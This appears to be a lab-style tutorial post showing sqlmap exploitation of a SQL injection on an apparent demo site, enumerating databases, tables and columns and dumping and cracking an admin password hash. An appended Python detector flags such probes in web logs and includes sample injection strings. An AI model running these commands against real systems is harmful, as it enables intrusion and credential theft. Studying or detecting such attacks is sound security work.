Extracting Data from SQLi Flaws Using Sqlmap


Gaining access to a target system's database through a SQL injection vulnerability present on that system.

Target system: testasp.vulnweb.com/showforum.asp?id=0
Step 1: We send a single quote in the id=0 parameter, as id=0', and expect the page to come back with an error.




Step 2: Using sqlmap to take advantage of this vulnerability, let's find the existing databases (--dbs) and the current user (--current-user).

root@bt:/pentest/database/sqlmap# python sqlmap.py -u 'testasp.vulnweb.com/showforum.asp?id=0' --dbs --current-user

.....
.....

[15:41:08] [INFO] testing MySQL
[15:41:08] [WARNING] the back-end DBMS is not MySQL
[15:41:08] [INFO] testing Oracle
[15:41:08] [WARNING] the back-end DBMS is not Oracle
[15:41:08] [INFO] testing PostgreSQL
[15:41:09] [WARNING] the back-end DBMS is not PostgreSQL
[15:41:09] [INFO] testing Microsoft SQL Server
[15:41:09] [INFO] confirming Microsoft SQL Server
[15:41:10] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[15:41:10] [INFO] fetching current user
current user:    'acunetix'

[15:41:10] [INFO] fetching database names
[15:41:11] [INFO] the SQL query used returns 7 entries
[15:41:11] [INFO] retrieved: "acublog"
[15:41:11] [INFO] retrieved: "acuforum"
[15:41:12] [INFO] retrieved: "acuservice"
[15:41:12] [INFO] retrieved: "master"
[15:41:12] [INFO] retrieved: "model"
[15:41:13] [INFO] retrieved: "msdb"
[15:41:13] [INFO] retrieved: "tempdb"
available databases [7]:                                                      
[*] acublog
[*] acuforum
[*] acuservice
[*] master
[*] model
[*] msdb
[*] tempdb

[15:41:13] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 60 times
[15:41:13] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/testasp.vulnweb.com'

[*] shutting down at 15:41:13

Step 3: Let's find the tables in the database named acublog.


root@bt:/pentest/database/sqlmap# python sqlmap.py -u 'testasp.vulnweb.com/showforum.asp?id=0' -D acublog --tables

.....
.....

[15:45:16] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[15:45:16] [INFO] fetching tables for database: acublog
[15:45:25] [INFO] the SQL query used returns 3 entries
[15:45:26] [INFO] retrieved: "dbo.comments"
[15:45:27] [INFO] retrieved: "dbo.news"
[15:45:27] [INFO] retrieved: "dbo.users"
Database: acublog                                                             
[3 tables]
+--------------+
| dbo.comments |
| dbo.news     |
| dbo.users    |
+--------------+

[15:45:27] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 4 times
[15:45:27] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/testasp.vulnweb.com'

[*] shutting down at 15:45:27

Step 4: Let's find all the column names in the dbo.users table.


root@bt:/pentest/database/sqlmap# python sqlmap.py -u 'testasp.vulnweb.com/showforum.asp?id=0' -D acublog -T dbo.users --columns

.....
.....

[15:48:24] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[15:48:24] [INFO] fetching columns for table 'users' in database 'acublog'
[15:48:25] [INFO] the SQL query used returns 3 entries
[15:48:25] [INFO] retrieved: "alevel","int"
[15:48:26] [INFO] retrieved: "uname","nvarchar"
[15:48:26] [INFO] retrieved: "upass","nvarchar"
Database: acublog                                                             
Table: dbo.users
[3 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| alevel | int      |
| uname  | nvarchar |
| upass  | nvarchar |
+--------+----------+

[15:48:27] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 4 times
[15:48:27] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/testasp.vulnweb.com'

[*] shutting down at 15:48:27

Step 5: Let's pull the data in the uname and upass columns of the dbo.users table.


root@bt:/pentest/database/sqlmap#  python sqlmap.py -u 'testasp.vulnweb.com/showforum.asp?id=0' -D acublog -T dbo.users -C uname,upass --dump

.....
.....

[15:56:38] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[15:56:51] [INFO] cracked password 'none' for hash '334c4a4c42fdb79d7ebc3e73b517e6f8'
[15:56:51] [INFO] postprocessing table dump                                   
Database: acublog
Table: dbo.users
[1 entry]
+-------+-----------------------------------------+
| uname | upass                                   |
+-------+-----------------------------------------+
| admin | 334c4a4c42fdb79d7ebc3e73b517e6f8 (none) |
+-------+-----------------------------------------+

[15:56:51] [INFO] table 'acublog.dbo.users' dumped to CSV file '/pentest/database/sqlmap/output/testasp.vulnweb.com/dump/acublog/users.csv'
[15:56:51] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 7 times
[15:56:51] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/testasp.vulnweb.com'

[*] shutting down at 15:56:51



That's all, I hope I explained it clearly :D
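Seen from the server side, the steps above leave a recognisable trail: non-numeric values in the integer id parameter, together with the HTTP 500 responses that sqlmap itself reports. The following is an added example, not part of the original post, that looks for that pattern in web server logs. The log lines, the IP addresses, the /search.asp path and the NUMERIC_PARAMS table are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Assumption: parameters the application expects to be plain integers.
NUMERIC_PARAMS = {"/showforum.asp": {"id"}}

# Constructed sample in IIS W3C style (not taken from the page):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2012-01-01 15:40:58 203.0.113.7 GET /showforum.asp id=0 200 Mozilla/5.0
2012-01-01 15:41:01 203.0.113.7 GET /showforum.asp id=0%27 500 Mozilla/5.0
2012-01-01 15:41:02 203.0.113.7 GET /showforum.asp id=0%20AND%201=1 200 sqlmap/1.0-dev
2012-01-01 15:41:03 203.0.113.7 GET /showforum.asp id=0%20UNION%20ALL%20SELECT%20NULL-- 500 sqlmap/1.0-dev
2012-01-01 15:41:04 198.51.100.9 GET /showforum.asp id=2 200 Mozilla/5.0
2012-01-01 15:41:05 198.51.100.9 GET /search.asp q=o%27brien 200 Mozilla/5.0
"""

def find_injection_probes(log_text, min_bad=2):
    """Return {(client_ip, uri_stem): counters} for clients that repeatedly
    send non-numeric values in parameters that should be integers."""
    stats = defaultdict(lambda: {"bad_values": 0, "http_500": 0, "sqlmap_ua": False})
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) != 8:
            continue  # skip W3C header lines and malformed rows
        _date, _time, ip, _method, stem, query, status, agent = fields
        expected = NUMERIC_PARAMS.get(stem.lower(), set())
        # parse_qsl percent-decodes, so %27 is compared as a literal quote.
        bad = [v for k, v in parse_qsl(query, keep_blank_values=True)
               if k.lower() in expected and not re.fullmatch(r"\d+", v)]
        if not bad:
            continue  # a quote in a free-text field (q=o'brien) is not flagged
        entry = stats[(ip, stem)]
        entry["bad_values"] += 1
        entry["http_500"] += status == "500"
        # The User-Agent is easy to change, so it is only a supporting signal.
        entry["sqlmap_ua"] |= agent.lower().startswith("sqlmap/")
    return {k: v for k, v in stats.items() if v["bad_values"] >= min_bad}

if __name__ == "__main__":
    for (ip, stem), counters in find_injection_probes(SAMPLE_LOG).items():
        print(ip, stem, counters)
```

The same integer-only check, applied in the application before the value reaches the query, is what stops the error seen in Step 1.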
